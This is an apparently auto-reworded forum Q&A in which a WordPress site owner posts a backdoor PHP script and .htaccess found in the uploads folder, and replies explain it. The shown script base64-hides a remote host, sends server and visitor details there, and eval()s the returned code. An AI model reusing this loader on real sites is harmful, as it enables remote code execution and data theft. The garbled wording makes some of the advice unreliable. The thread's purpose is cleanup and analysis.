I've discovered this script scattered around my Wordpress uploads folder on my small shared host. I'm not sure the way it arrived, I will always be while using latest versions of Wordpress and all sorts of my plug ins.

The script continues to be scattered into all possible sub-folders inside my uploads folder, having a assistant .htaccess file, to direct visitors to this script. It is simply found within the uploads folder, no files outdoors it.

Are you able to assist me to decode what this script was doing and how could I get over it whether it did anything bad?

This is actually the assistant .htaccess file

Options -MultiViews
ErrorDocument 404 //wp-content/uploads/54580.php

Here is the primary script (or perhaps in pastebin)

error_reporting(0);
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
$f = base64_decode("cnNzbmV3cy53cw==");
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "ceaa2f454d1892ee1d5c3f777e07144d") $f = $_REQUEST["id"];
if ($c = file_get_contents(base64_decode("aHR0cDovLzdhZHMu") . $f . $z)) eval($c); 
else if ($c = file_get_contents(base64_decode("aHR0cDovLzcu") . $f . $z)) eval($c); 
else {
    $cu = curl_init(base64_decode("aHR0cDovLzcxLg==") . $f . $z);
    curl_setopt($cu, CURLOPT_RETURNTRANSFER, 1);
    $o = curl_exec($cu);
    curl_close($cu);
    eval($o);
}
;
die(); 

First, it turns off error confirming, ensuring if something wrong happens, nobody might find the mistake message.

then, it appears to download personal files from another server.

The Ip of this server continues to be obfuscated by jumbling it a little, and base64encoding the fragments. The complex spaghetti-code of if-claims reassembles it right into a (most likely) valid server Ip.

Whether it can download that file, it'll eval() it, meaning that it'll interpret it as being PHP, and run it.

Are you able to assist me to decode what this script was doing

It loads a payload from another server and executes it.

and just how could I get over it whether it did anything bad?

Take away the script. Restore the backup of the site which was not tainted. Contact someone familiar with such problems and obtain overview of your website and directions for future years.

Remove this line in the .htacces inside your root folder

ErrorDocument 404 //wp-content/uploads/54580.php

Remove all files using the title 54580.php

Give write public permissions only on wordpress-content/uploads

Give read permissions for public for that relaxation.

What it really does now ... It's delivering some good info to rssnews(us dot)ws

It's calling an online url, maybe for sendin information. 7ads.rssnews.com or 7.rssnews.com

I believe, that you ought to remove this file out of your webserver, it doesn't appear to become secure.